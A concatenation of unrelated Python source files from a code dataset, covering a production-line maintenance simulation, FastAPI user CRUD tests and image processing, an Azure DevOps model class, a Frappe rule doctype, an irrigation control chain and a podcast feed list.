            self.counter = self.init_time_base
    def reset(self, random_init):
        """Reset runtime state; truthy `random_init` starts in a random health state."""
        self.under_m = False
        self.deque = 0
        self.anti_jobs = 0
        self.action = None
        self.m_cd = 0
        self.h_tracker = [[],[],[],[]]
        self.random_init = random_init
        self.init_h_state(random_init)
        if self.init_time_base:
            self.counter = self.init_time_base
    def step(self, action):
        """Record `action` for this step and issue the matching parts request.

        Actions 0/1 are production (different intensities) and are only legal
        while the machine is not broken; action 2 schedules maintenance.
        """
        if action == 0:
            if self.init_time_base:
                self.counter -= 1   # consume one unit of the work budget
            assert self.h_state != 3
            self.action = action
            n = self.ACTION[self.action]
            self.request_parts(n)
            self.state_time[self.h_state] += 1
        elif action == 1:
            if self.init_time_base:
                self.counter -= 1
            assert self.h_state != 3
            self.action = action
            n = self.ACTION[self.action]
            self.request_parts(n)
            self.state_time[self.h_state] += 1
        elif action == 2:
            # Maintenance: request no parts and enter the maintenance state.
            self.action = action
            self.request_parts(0)
            self.register_m()
            self.state_time[self.h_state] += 1
        else:
            raise ValueError('action [%d] is out of range'%action)
    def init_h_state(self, random_init):
        """Initialize health state; random start also samples elapsed dwell time."""
        if type(self.T) == Continue_Transition:
            if random_init:
                self.h_state = random.randint(0, 3)
                steps = self.T.init_trans(self.h_state)
                self.state_time = [0] * 4
                self.state_time[self.h_state] = steps
                if self.h_state == 3:
                    # Broken start: also sample how much repair time remains.
                    self.register_m()
                    steps = random.randint(0, self.m_cd-1)
                    self.m_cd -= steps
                    assert self.m_cd > 0
                    self.state_time = [0] * 4
                    self.state_time[self.h_state] = steps
            else:
                self.h_state = 0
                self.state_time = [0] * 4
        else:
            raise ValueError("We currently only support continuous transitions")
    @property
    def health(self):
        # (state, time already spent in that state)
        return self.h_state, self.state_time[self.h_state]
    def request_parts(self, n):
        self.request_jobs = n
    def recieve_parts(self, n):
        # NOTE: name kept as-is ("recieve") — callers elsewhere use this spelling.
        self.anti_jobs = n
    def register_m(self):
        """Enter maintenance: drop all jobs and draw a repair cool-down."""
        self.under_m = True
        self.anti_jobs = 0
        self.h_state = 3
        self.request_jobs = 0
        if self.m_cd == 0:
            self.m_cd = max(1, math.floor(np.random.normal(12, 3)))
    def proceed(self):
        """Settle the step: finish jobs or count down maintenance, then transition."""
        if not self.under_m:
            self.deque = self.anti_jobs
            self.anti_jobs = 0
            self.request_jobs = 0
            new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
            if new_h_state != self.h_state:
                # Record how long the machine dwelt in the state it is leaving.
                self.h_tracker[self.h_state].append(self.state_time[self.h_state])
            self.h_state = new_h_state
        else:
            self.m_cd -= 1
            assert self.m_cd >= 0, 'self.m_cd value is {}'.format(self.m_cd)
            self.deque = self.anti_jobs
            if self.m_cd == 0:
                # Maintenance finished: machine transitions back to healthy.
                self.under_m = False
                new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
                assert new_h_state != self.h_state, 'new state {} should be different from the original state {}'.format(new_h_state, self.h_state)
                if new_h_state != self.h_state:
                    self.h_tracker[self.h_state].append(self.state_time[self.h_state])
                self.h_state = new_h_state
                if self.init_time_base:
                    self.counter = self.init_time_base
                self.state_time = [0] * 4
                self.restart += 1
    @property
    def valid_actions(self):
        """Action mask [produce-fast, produce-slow, maintain]; 1.0 = allowed."""
        if not self.init_time_base:
            if self.h_state == 3 or self.under_m:
                valid_actions = [0., 0., 1.]
            elif self.h_state == 0 or self.h_state == 1:
                valid_actions = [1., 1., 1.]
            elif self.h_state == 2:
                valid_actions = [1., 1., 1.]
            else:
                raise ValueError("we are in wrong {} state".format(self.h_state))
        else:
            # Time-base mode: maintenance is forced once the work budget runs
            # out, and disallowed in early health states while budget remains.
            if self.counter == 0:
                valid_actions = [0., 0., 1.]
            else:
                if self.h_state == 3 or self.under_m:
                    valid_actions = [0., 0., 1.]
                elif self.h_state == 0 or self.h_state == 1:
                    valid_actions = [1., 1., 0.]
                elif self.h_state == 2:
                    valid_actions = [1., 1., 1.]
                else:
                    raise ValueError("we are in wrong {} state".format(self.h_state))
        return valid_actions
    @property
    def cost(self):
        """Cost incurred this step; a fresh breakdown adds COST[-1] on top."""
        if self.action == 0 and self.h_state != 3:
            cost = self.COST[0]
        elif self.action == 1 and self.h_state != 3:
            cost = self.COST[1]
        elif self.h_state == 3 and self.state_time[3] == 0:
            # state_time[3] == 0 marks the step on which the breakdown occurred.
            cost = self.COST[-1]
            if self.action == 0:
                cost += self.COST[0]
            elif self.action == 1:
                cost += self.COST[1]
            else:
                raise ValueError('self.action cannot take {}, the current state time is {}, state is {}, m_cd is {}, under_m is {}'.format(self.action, self.state_time, self.h_state, self.m_cd, self.under_m))
        elif self.action == 2:
            cost = self.COST[2]
        else:
            raise ValueError("Our agent going to wrong state, action pair {}{}".format(self.h_state, self.action))
        return cost
# class Machine():
# def __init__(self, id, T, cell_id, config, time_base=False):
# self.T = T
# self.id = id
# self.cell_id = cell_id
# self.under_m = False
# self.deque = 0
# self.anti_jobs = 0
# self.action = None
# self.m_cd = 0
# self.ACTION = config['actions']
# self.COST = config['costs']
# self.h_history = np.zeros_like(self.COST)
# self.restart = 0
# # self.h_tracker = [[],[],[],[]]
# self.init_h_state()
# self.init_time_base = time_base
# if time_base:
# self.counter = self.init_time_base
#
#
# def step(self, action):
# if action == 0:
# if self.init_time_base:
# self.counter -= 1
# assert self.h_state != 3
# self.action = action
# n = self.ACTION[self.action]
# self.request_parts(n)
# self.state_time[self.h_state] += 1
# elif action == 1:
# if self.init_time_base:
# self.counter -= 1
# assert self.h_state != 3
# self.action = action
# n = self.ACTION[self.action]
# self.request_parts(n)
# self.state_time[self.h_state] += 1
# elif action == 2:
# self.action = action
# self.request_parts(0)
# self.register_m()
# self.state_time[self.h_state] += 1
# else:
# raise ValueError('action [%d] is out of range'%action)
# self.h_history[self.h_state] += 1
#
# def init_h_state(self):
# if type(self.T) == Continue_Transition:
# self.h_state = random.randint(0, 3)
# steps = self.T.init_trans(self.h_state)
# self.state_time = [0] * 4
# self.state_time[self.h_state] = steps
# if self.h_state == 3:
# self.register_m()
# steps = random.randint(0, self.m_cd-1)
# self.m_cd -= steps
# self.state_time = [0] * 4
# self.state_time[self.h_state] = steps
# else:
# self.h_state = 0
# self.state_time = [0] * 4
#
# @property
# def health(self):
# return self.h_state, self.state_time[self.h_state]
#
# def request_parts(self, n):
# self.request_jobs = n
#
# def recieve_parts(self, n):
# self.anti_jobs = n
#
# def register_m(self):
# self.under_m = True
# self.anti_jobs = 0
# self.h_state = 3
# self.request_jobs = 0
# if self.m_cd == 0:
# self.m_cd = math.floor(np.random.normal(12, 3))
#
# def proceed(self):
# if not self.under_m:
# self.deque = self.anti_jobs
# self.anti_jobs = 0
# self.request_jobs = 0
# new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
# # if new_h_state != self.h_state:
# # self.h_tracker[self.h_state].append(self.state_time[self.h_state])
# self.h_state = new_h_state
# else:
# self.m_cd -= 1
# self.deque = self.anti_jobs
# if self.m_cd == 0:
# self.under_m = False
# new_h_state = self.T.transit(self.h_state, self.action, self.state_time)
# # if new_h_state != self.h_state:
# # self.h_tracker[self.h_state].append(self.state_time[self.h_state])
# self.h_state = new_h_state
# if self.init_time_base:
# self.counter = self.init_time_base
# self.state_time = [0] * 4
# self.restart += 1
#
# @property
# def valid_actions(self):
# if self.h_state == 3 or self.under_m:
# valid_actions = [0., 0., 1.]
# else:
# if self.init_time_base:
# if self.counter == 0:
# valid_actions = [0., 0., 1.]
# valid_actions = [1] * 3
# return valid_actions
#
# @property
# def cost(self):
# if self.action == 0 and self.h_state != 3:
# cost = self.COST[0]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# elif self.action == 1 and self.h_state != 3:
# cost = self.COST[1]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# elif self.h_state == 3 and self.state_time[3] == 0:
# cost = self.COST[-1]
# if self.action == 0:
# cost += self.COST[0]
# # print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
# elif self.action == 1:
# cost += self.COST[1]
# # print('Agent {} took action {}, and breakdown, and incur {} cost'.format(self.id, self.action, cost))
# else:
# raise ValueError('self.action cannot take {}'.format(self.action))
# elif self.action == 2:
# cost = self.COST[2]
# # print('Agent {} took action {} and incur {} cost'.format(self.id, self.action, cost))
# else:
# raise ValueError("Our agent going to wrong state, action pair {}{}".format(self.h_state, self.action))
# return cost
class Cell():
    """A production cell: a group of machines plus an input job buffer.

    Cells form a chain via ``add_cells`` (p_cell = upstream, f_cell =
    downstream); jobs accepted by this cell's machines feed the downstream
    cell's buffer.
    """
    def __init__(self, id):
        self.id = id
        self.deque = 0       # jobs completed by this cell in the last step
        self.anti_jobs = 0   # jobs waiting in this cell's input buffer
        self.p_cell = None   # previous (upstream) cell; None for the first cell
        self.f_cell = None   # following (downstream) cell; None for the last cell
    def add_machines(self, m_list):
        self.machines = m_list
    def add_cells(self, p_cell=None, f_cell=None):
        # Link this cell into the chain, keeping both directions consistent.
        self.p_cell = p_cell
        self.f_cell = f_cell
        if self.p_cell:
            self.p_cell.f_cell = self
        if self.f_cell:
            self.f_cell.p_cell = self
    def assign_jobs(self):
        """Grant the machines' part requests from this cell's buffer."""
        self.deque = 0
        if not self.p_cell:
            # First cell: raw material is unlimited, so every request is granted.
            assert self.anti_jobs >= 0, 'anti_jobs {} should be always greater than 0'.format(self.anti_jobs)
            recieve_requests = np.sum(list(map(lambda x: x.request_jobs, self.machines)))
            self.anti_jobs += recieve_requests
            for machine in self.machines:
                machine.recieve_parts(machine.request_jobs)
            assert self.anti_jobs >= np.sum(list(map(lambda x: x.anti_jobs, self.machines))), 'anti_jobs is {}, machines in cell {} actually get {}'.format(self.anti_jobs, self.id, np.sum(list(map(lambda x: x.anti_jobs, self.machines))))
            if self.f_cell:
                self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
        else:
            if self.anti_jobs > 0:
                recieve_requests = np.sum(list(map(lambda x: x.request_jobs, self.machines)))
                if self.anti_jobs >= recieve_requests:
                    # Buffer can satisfy every machine in full.
                    for machine in self.machines:
                        machine.recieve_parts(machine.request_jobs)
                    if self.f_cell:
                        self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
                else:
                    # Scarce buffer: hand out jobs one at a time, choosing a
                    # machine with probability proportional to its unmet request.
                    # NOTE(review): this loop runs until *all* requests are met,
                    # i.e. it can allocate more jobs than self.anti_jobs holds —
                    # confirm whether it should stop after anti_jobs allocations
                    # (the commented-out assert in proceed() hints it can go negative).
                    request_jobs = np.array(list(map(lambda x: x.request_jobs, self.machines)), dtype=np.float32)
                    jobs_pool = np.zeros_like(self.machines, dtype=np.float32)
                    while np.sum(request_jobs - jobs_pool) > 0:
                        p = (request_jobs - jobs_pool) / np.sum(request_jobs - jobs_pool)
                        idx = np.random.choice(len(self.machines), 1, p=p)[0]
                        jobs_pool[idx] += 1.
                    for idx, machine in enumerate(self.machines):
                        machine.recieve_parts(jobs_pool[idx])
                    if self.f_cell:
                        self.f_cell.anti_jobs += np.sum(list(map(lambda x: x.anti_jobs, self.machines)))
    def proceed(self):
        """Advance every machine one step and drain finished jobs from the buffer."""
        for m in self.machines:
            m.proceed()
        self.deque = np.sum(list(map(lambda x: x.deque, self.machines)))
        self.anti_jobs -= self.deque
        # assert self.anti_jobs >= 0, 'anti_jobs is {}, and deques is {}'.format(self.anti_jobs, self.deque)
    @property
    def buffer_size(self):
        return self.anti_jobs
    def reset(self):
        self.deque = 0
        self.anti_jobs = 0
class Simulation():
    """Whole production line: a chain of Cells, each holding several Machines."""
    def __init__(self, map_name, time_base=False):
        self._initialize(map_name, time_base)
    def _initialize(self, map_name, time_base):
        # Build cells and machines from the map configuration.
        # NOTE(review): get_map_params is only imported under __main__ in this
        # file — confirm it is also imported at module scope elsewhere.
        config = get_map_params(map_name)
        cell_ids = config['cells']
        machine_ids = config['machines']
        self.sale_price = config['sale_price']
        continuous = config['continuous_trans']
        # One row of machine ids per cell.
        machine_ids = np.array(machine_ids).reshape([len(cell_ids), -1])
        self.machines = []
        self.cells = []
        for i in range(machine_ids.shape[0]):
            cell_id = i
            self.cells.append(Cell(cell_id))
            for j in range(machine_ids.shape[1]):
                machine_id = machine_ids[i, j]
                if not continuous:
                    transition = config['transitions'][i]
                    T = Transition(transition, schedule=False)
                else:
                    T = Continue_Transition(config['dist'], config['first_params'], config['second_params'], config['lower_bounds'])
                self.machines.append(Machine(machine_id, T, cell_id, config, time_base))
            # Attach this cell's machines and link it to the upstream cell.
            self.cells[-1].add_machines(self.machines[-machine_ids.shape[1]:])
            if i > 0:
                p_cell = self.cells[i-1]
                self.cells[-1].add_cells(p_cell)
    def reset(self, random_init_sim):
        """Reset all cells/machines; indices in `random_init_sim` start randomized."""
        for cell in self.cells:
            cell.reset()
        random_list = [0] * len(self.machines)
        if random_init_sim:
            for ele in random_init_sim:
                random_list[ele] = 1
        for idx, machine in enumerate(self.machines):
            machine.reset(random_list[idx])
    def step(self, actions):
        """Apply one action per machine, then move jobs through the line."""
        for idx, machine in enumerate(self.machines):
            machine.step(actions[idx])
        for cell in self.cells:
            cell.assign_jobs()
        for cell in self.cells:
            cell.proceed()
    def get_avail_agent_actions(self, agent_id):
        return self.machines[agent_id].valid_actions
    @property
    def products(self):
        # Finished products = jobs completed by the last cell this step.
        final_cell = self.cells[-1]
        products = final_cell.deque
        return products
    @property
    def profit(self):
        products = self.products
        cost = np.sum(list(map(lambda x: x.cost, self.machines)))
        return products * self.sale_price - cost
    def get_buffers_agent(self, agent_id):
        """Return (own cell buffer, next cell buffer) as fractions of all buffers."""
        total_buffer = np.sum(list(map(lambda x:x.buffer_size, self.cells)))
        if total_buffer == 0:
            return 0., 0.
        agent = self.machines[agent_id]
        cell_id = agent.cell_id
        front_buffer = self.cells[cell_id].buffer_size
        following_buffer = 0
        # NOTE(review): condition excludes the last cell's buffer — confirm
        # whether this should be `cell_id + 1 < len(self.cells)`.
        if cell_id + 1 < len(self.cells) -1:
            following_buffer = self.cells[cell_id+1].buffer_size
        return front_buffer / total_buffer, following_buffer / total_buffer
    def get_cost_agent(self, agent_id):
        return self.machines[agent_id].cost
if __name__ == '__main__':
    # Smoke test: run random rollouts on map 263 and report dwell-time stats.
    from scenes import get_map_params
    import matplotlib.pyplot as plt
    import numpy as np
    # These are the "Tableau 20" colors as RGB.
    tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
                 (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
                 (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
                 (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
                 (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
    # Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts.
    for i in range(len(tableau20)):
        r, g, b = tableau20[i]
        tableau20[i] = (r / 255., g / 255., b / 255.)
    def pie_plot(*args, **kw_args):
        # Pie chart of time fractions; kw_args['labels'] names each slice.
        labels = kw_args['labels']
        colors = tableau20[:len(labels)]
        sizes = args
        def func(pct, allvals):
            absolute = pct/100.*np.sum(allvals)
            return "{:.1f}%\n({:.1f} unit time)".format(pct, absolute)
        fig1, ax1 = plt.subplots()
        ax1.pie(sizes, colors=colors, labels=labels, autopct=lambda pct:func(pct, sizes),
                shadow=True, startangle=90)
        ax1.axis('equal')  # Equal aspect ratio ensures that pie is drawn as a circle.
        plt.show()
    map_name = 263
    profit = 0
    sim = Simulation(map_name)
    for i in range(20):
        # Randomize the initial health state of 3 of the 6 machines.
        random_init_sim = list(np.random.choice(6, 3, replace=False))
        print("At iteration {}".format(i))
        sim.reset(random_init_sim)
        num = 0
        while num < 64:
            actions = []
            # NOTE(review): this loop variable shadows the outer `i`; harmless
            # here (outer `i` is reassigned each iteration) but worth renaming.
            for i in range(6):
                action_p = np.array([1., 0., 0.])
                valid_actions = sim.get_avail_agent_actions(i)
                # Mask invalid actions; epsilon keeps the distribution normalizable.
                action_p = np.array(valid_actions, dtype=np.float32) * (action_p + 1e-9)
                p = action_p / np.sum(action_p)
                action = np.random.choice(3, 1, p=p)[0]
                actions.append(action)
            sim.step(actions)
            num += 1
            profit += sim.profit
    # Dwell-time statistics, separately for the first and second cell's machines.
    for i in range(4):
        h = np.concatenate(list(map(lambda x:np.array(x.h_tracker[i]), sim.machines[:3])))
        print("Health state %d has mean %.3f, std %.3f"%(i, np.mean(h), np.std(h)))
    for i in range(4):
        h = np.concatenate(list(map(lambda x:np.array(x.h_tracker[i]), sim.machines[3:])))
        print("Health state %d has mean %.3f, std %.3f"%(i, np.mean(h), np.std(h)))
    print(profit)
| StarcoderdataPython |
3301193 | <reponame>TeamAbstract/GeneticScheduling
from util.timeUtil import *
from util.systemUtil import * | StarcoderdataPython |
3380717 | import logging
from ..exit import do_exit
logger = logging.getLogger("emulator")

# Last id handed out by next_event_id(); -1 means none issued yet.
event_id = -1
# When non-zero, the emulator exits once event_id reaches this count.
event_id_limit = 0
def next_event_id(uc):
    """Return the next sequential event id, exiting when the configured limit is hit.

    Args:
        uc: emulator handle, passed through to do_exit() on shutdown.
    """
    global event_id
    global event_id_limit
    event_id += 1
    if event_id_limit != 0 and event_id >= event_id_limit:
        logger.info("[*] Event id limit reached, exiting")
        do_exit(uc, 0)
    return event_id
def set_trace_id_limit(limit):
    """Set the maximum number of events to emit before exiting (0 = unlimited)."""
    global event_id_limit
    event_id_limit = limit
| StarcoderdataPython |
1648998 | <gh_stars>0
import torch

# Scratch check: MultiheadAttention with query embed dim 2048 and
# mismatched key/value dims (kdim = vdim = 85).
a = torch.randn((3, 2048, 7, 7))   # (batch, channels, H, W) feature map
a = a.permute(2, 3, 0, 1)          # -> (H, W, batch, channels)
a = a.view(-1, 3, 2048)            # -> (H*W, batch, channels) = (seq, batch, embed)
qry = a
attn = torch.nn.MultiheadAttention(2048, num_heads=1, dropout=0.2, kdim=85, vdim=85)
keys = torch.randn((50, 3, 85))    # (source seq, batch, kdim)
values = torch.randn((50, 3, 85))  # (source seq, batch, vdim)
# this is the class embeddings
# att = torch.randn((85, 50))
att = attn(qry, keys, values)      # returns (attn_output, attn_weights)
print()
| StarcoderdataPython |
73795 | from datetime import datetime
from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app import crud
from app.core.security import verify_password
from app.models.domain import Domain
from app.models.event import Event
from app.models.user import User
from app.schemas.user import UserCreate, UserUpdate
from app.tests.utils.domain import create_random_domain
from app.tests.utils.event import create_random_page_view_event
from app.tests.utils.user import create_random_user
from app.tests.utils.utils import random_email, random_lower_string
def test_create_user(db: Session) -> None:
    """Creating a user stores the e-mail and a hashed (not plain) password."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=email, password=password)
    user = crud.user.create(db, obj_in=user_in)
    assert user.email == email
    assert hasattr(user, "hashed_password")
def test_authenticate_user(db: Session) -> None:
    """Authentication with the correct credentials returns the created user."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=email, password=password)
    user = crud.user.create(db, obj_in=user_in)
    authenticated_user = crud.user.authenticate(db, email=email, password=password)
    assert authenticated_user
    assert user.email == authenticated_user.email
def test_not_authenticate_user(db: Session) -> None:
    """Authentication for a non-existent account returns None."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user = crud.user.authenticate(db, email=email, password=password)
    assert user is None
def test_check_if_user_is_active(db: Session) -> None:
    """A freshly created user is active by default."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=email, password=password)
    user = crud.user.create(db, obj_in=user_in)
    is_active = crud.user.is_active(user)
    assert is_active is True
def test_check_if_user_is_active_inactive(db: Session) -> None:
    """A user created with disabled=True still reports as active here."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=email, password=password, disabled=True)
    user = crud.user.create(db, obj_in=user_in)
    is_active = crud.user.is_active(user)
    # NOTE(review): asserting truthy despite disabled=True mirrors the original
    # test; confirm whether `disabled` is meant to affect is_active().
    assert is_active
def test_check_if_user_is_superuser(db: Session) -> None:
    """A user created with is_superuser=True is reported as a superuser."""
    email = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=email, password=password, is_superuser=True)
    user = crud.user.create(db, obj_in=user_in)
    is_superuser = crud.user.is_superuser(user)
    assert is_superuser is True
def test_check_if_user_is_superuser_normal_user(db: Session) -> None:
    """A regular user is not reported as a superuser."""
    username = random_email()
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in = UserCreate(email=username, password=password)
    user = crud.user.create(db, obj_in=user_in)
    is_superuser = crud.user.is_superuser(user)
    assert is_superuser is False
def test_get_user(db: Session) -> None:
    """Fetching a user by id returns an object equal to the created one."""
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    username = random_email()
    user_in = UserCreate(email=username, password=password, is_superuser=True)
    user = crud.user.create(db, obj_in=user_in)
    user_2 = crud.user.get(db, id=user.id)
    assert user_2
    assert user.email == user_2.email
    assert jsonable_encoder(user) == jsonable_encoder(user_2)
def test_update_user(db: Session) -> None:
    """Updating the password re-hashes it and the new hash verifies."""
    password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    email = random_email()
    user_in = UserCreate(email=email, password=password, is_superuser=True)
    user = crud.user.create(db, obj_in=user_in)
    new_password = random_lower_string()  # restored from "<PASSWORD>" placeholder
    user_in_update = UserUpdate(password=new_password, is_superuser=True)
    crud.user.update(db, db_obj=user, obj_in=user_in_update)
    user_2 = crud.user.get(db, id=user.id)
    assert user_2
    assert user.email == user_2.email
    assert verify_password(new_password, user_2.hashed_password)
def test_mark_deletion(db: Session):
    """mark_for_removal stamps the user's delete_at timestamp."""
    user = create_random_user(db)
    assert not user.delete_at
    crud.user.mark_for_removal(db, user)
    assert user.delete_at
def test_delete_pending_users(db: Session):
    """delete_pending_users removes a marked user with all owned domains/events,
    while leaving an unmarked user's data untouched."""
    # User 1: will be marked for deletion.
    user = create_random_user(db)
    domain = create_random_domain(db, owner_id=user.id)
    event_id = create_random_page_view_event(db, domain=domain).id
    # User 2: control, must survive the purge.
    user2 = create_random_user(db)
    domain2 = create_random_domain(db, owner_id=user2.id)
    event2_id = create_random_page_view_event(db, domain=domain2).id
    # Capture ids before the rows are deleted.
    domain_id = domain.id
    user_id = user.id
    user.delete_at = datetime.now()
    db.commit()
    crud.user.delete_pending_users(db)
    # Marked user and all dependent rows are gone.
    assert not db.query(Domain).get(domain_id)
    assert not db.query(User).get(user_id)
    assert not db.query(Event).filter(Event.id == event_id).scalar()
    # Control user's data is untouched.
    assert db.query(Event).filter(Event.id == event2_id).scalar()
    assert db.query(Domain).get(domain2.id)
    assert db.query(User).get(user2.id)
| StarcoderdataPython |
131024 | <reponame>amcclead7336/Enterprise_Data_Science_Final<gh_stars>0
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .release_definition_environment_step import ReleaseDefinitionEnvironmentStep
class ReleaseDefinitionApprovalStep(ReleaseDefinitionEnvironmentStep):
    """ReleaseDefinitionApprovalStep.

    :param id:
    :type id: int
    :param approver:
    :type approver: :class:`IdentityRef <release.v4_0.models.IdentityRef>`
    :param is_automated:
    :type is_automated: bool
    :param is_notification_on:
    :type is_notification_on: bool
    :param rank:
    :type rank: int
    """

    # Maps Python attribute names to REST payload keys/types for (de)serialization.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'int'},
        'approver': {'key': 'approver', 'type': 'IdentityRef'},
        'is_automated': {'key': 'isAutomated', 'type': 'bool'},
        'is_notification_on': {'key': 'isNotificationOn', 'type': 'bool'},
        'rank': {'key': 'rank', 'type': 'int'}
    }

    def __init__(self, id=None, approver=None, is_automated=None, is_notification_on=None, rank=None):
        # `id` is handled by the base environment-step model.
        super(ReleaseDefinitionApprovalStep, self).__init__(id=id)
        self.approver = approver
        self.is_automated = is_automated
        self.is_notification_on = is_notification_on
        self.rank = rank
| StarcoderdataPython |
59067 | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Wongkar and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Rule(Document):
    """Discount rule doctype; validation guards against duplicate discounts."""
    def validate(self):
        # NOTE(review): leftover debug message — it says "after_insert" but this
        # hook runs on validate; confirm whether it should be removed.
        frappe.msgprint("after_insert")
        # Reject a duplicate rule for the same item + down payment + tenor.
        leasing = frappe.db.get_value("Rule",{"item_code": self.item_code, "besar_dp" : self.besar_dp, "tenor": self.tenor}, "item_code")
        if leasing:
            frappe.throw("Disconut Item "+leasing+" sudah ada !")
        # Leasing rules must specify both down payment (DP) and tenor.
        if self.type == "Leasing" and self.besar_dp == "":
            frappe.throw("Masukkan besad DP !")
        if self.type == "Leasing" and self.tenor == "":
            frappe.throw("Masukkan besad Tenor !")
| StarcoderdataPython |
23655 | """Returns words from the given paragraph which has been repeated most,
incase of more than one words, latest most common word is returned. """
import string
def mostCommonWord(paragraph: str) -> str:
    """Return the most frequent word in *paragraph*, case-insensitively.

    Punctuation is treated as whitespace.  When several words share the top
    count, the word whose winning occurrence appears last in the text wins.
    """
    # Map every punctuation character to a space so it acts as a word separator.
    separators = str.maketrans(string.punctuation, ' ' * len(string.punctuation))
    cleaned = paragraph.translate(separators)

    counts = {}
    best_word = ''
    best_count = 0
    for word in cleaned.lower().split():
        counts[word] = counts.get(word, 0) + 1
        # `>=` (not `>`) deliberately lets a later word steal a tied lead.
        if counts[word] >= best_count:
            best_count = counts[word]
            best_word = word
    return best_word

print(mostCommonWord("HacktoberFest is live! Riddhi is participating in HACKtoBERfEST.Happy Coding.")) #Output: hacktoberfest
109925 | from typing import List
from io import BytesIO
import numpy as np
from PIL import Image
from fastapi import FastAPI, Request, File, UploadFile
from fastapi.responses import HTMLResponse, StreamingResponse
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
app = FastAPI()
# Serve static assets and HTML templates from the conventional directories.
app.mount("/static", StaticFiles(directory="static"), name="static")
templates = Jinja2Templates(directory="templates")
@app.get('/', response_class=HTMLResponse)
async def read_root(request: Request):
    """Serve the upload form (index page)."""
    return templates.TemplateResponse("index.html", {"request": request})
@app.post('/api/image-processing')
async def create_image_processing(files: List[UploadFile] = File(...)):
    """Apply a 2x2 pixel rearrangement to the first uploaded image and return it as PNG."""
    # open image
    bytes_io = BytesIO(files[0].file.read())
    image = Image.open(bytes_io).convert('RGB')
    # image processing
    data = np.array(image)
    h, w, _ = data.shape
    # Crop to even dimensions so the image tiles cleanly into 2x2 blocks.
    h = int(h // 2) * 2
    w = int(w // 2) * 2
    # Split into 2x2 neighborhoods and swap the block/offset axes — this
    # rearranges pixels within/between the 2x2 tiles (presumably a mosaic /
    # scramble effect; confirm intended output against the frontend).
    data = data[:h, :w, :] \
        .reshape(h // 2, 2, w // 2, 2, -1) \
        .transpose(1, 0, 3, 2, 4) \
        .reshape(h, w, -1)
    content = BytesIO()
    Image.fromarray(data).save(content, format='png')
    content.seek(0)  # rewind so StreamingResponse reads from the start
    # response
    return StreamingResponse(content, media_type='image/png')
| StarcoderdataPython |
10590 | <reponame>bopopescu/docker_images_a
class Check_Excessive_Current(object):
    """Builds a control chain that shuts irrigation down on excessive current.

    The chain waits on check_excessive_current(); when it fires, it closes the
    master valve, releases irrigation control, disables all sprinklers, waits,
    and then resets the chain.
    """
    def __init__(self,chain_name,cf,handlers,irrigation_io,irrigation_hash_control,get_json_object):
        self.get_json_object = get_json_object
        cf.define_chain(chain_name, False )
        cf.insert.assert_function_reset(self.check_excessive_current)
        cf.insert.log("excessive_current_found")
        cf.insert.send_event("IRI_CLOSE_MASTER_VALVE",False)
        cf.insert.send_event( "RELEASE_IRRIGATION_CONTROL")
        cf.insert.one_step(irrigation_io.disable_all_sprinklers )
        cf.insert.wait_event_count( count = 15 )  # cool-down before re-arming
        cf.insert.reset()
        self.handlers = handlers
        self.irrigation_hash_control = irrigation_hash_control
    def check_excessive_current(self,cf_handle, chainObj, parameters, event):
        # TBD: always False until real current monitoring is implemented.
        return False
| StarcoderdataPython |
22221 | """
List of podcasts and their filename parser types.
"""
from .rss_parsers import BaseItem, TalkPythonItem, ChangelogItem, IndieHackersItem
import attr
@attr.s(slots=True, frozen=True)
class Podcast:
    """Immutable description of one podcast feed."""
    name = attr.ib(type=str)             # short key used for PODCAST_MAP lookups
    title = attr.ib(type=str)            # human-readable show title
    url = attr.ib(type=str)              # show homepage
    rss = attr.ib(type=str)              # RSS feed URL
    rss_parser = attr.ib(type=BaseItem)  # parser class for this feed's items
# Registry of supported podcast feeds, each paired with the item parser
# that understands its filename/metadata format.
PODCASTS = [
    Podcast(
        name="talkpython",
        title="Talk Python To Me",
        url="https://talkpython.fm",
        rss="https://talkpython.fm/episodes/rss",
        rss_parser=TalkPythonItem,
    ),
    Podcast(
        name="pythonbytes",
        title="Python Bytes",
        url="https://pythonbytes.fm/",
        rss="https://pythonbytes.fm/episodes/rss",
        rss_parser=TalkPythonItem,
    ),
    Podcast(
        name="changelog",
        title="The Changelog",
        url="https://changelog.com/podcast",
        rss="https://changelog.com/podcast/feed",
        rss_parser=ChangelogItem,
    ),
    Podcast(
        name="podcastinit",
        title="Podcast.__init__",
        url="https://www.podcastinit.com/",
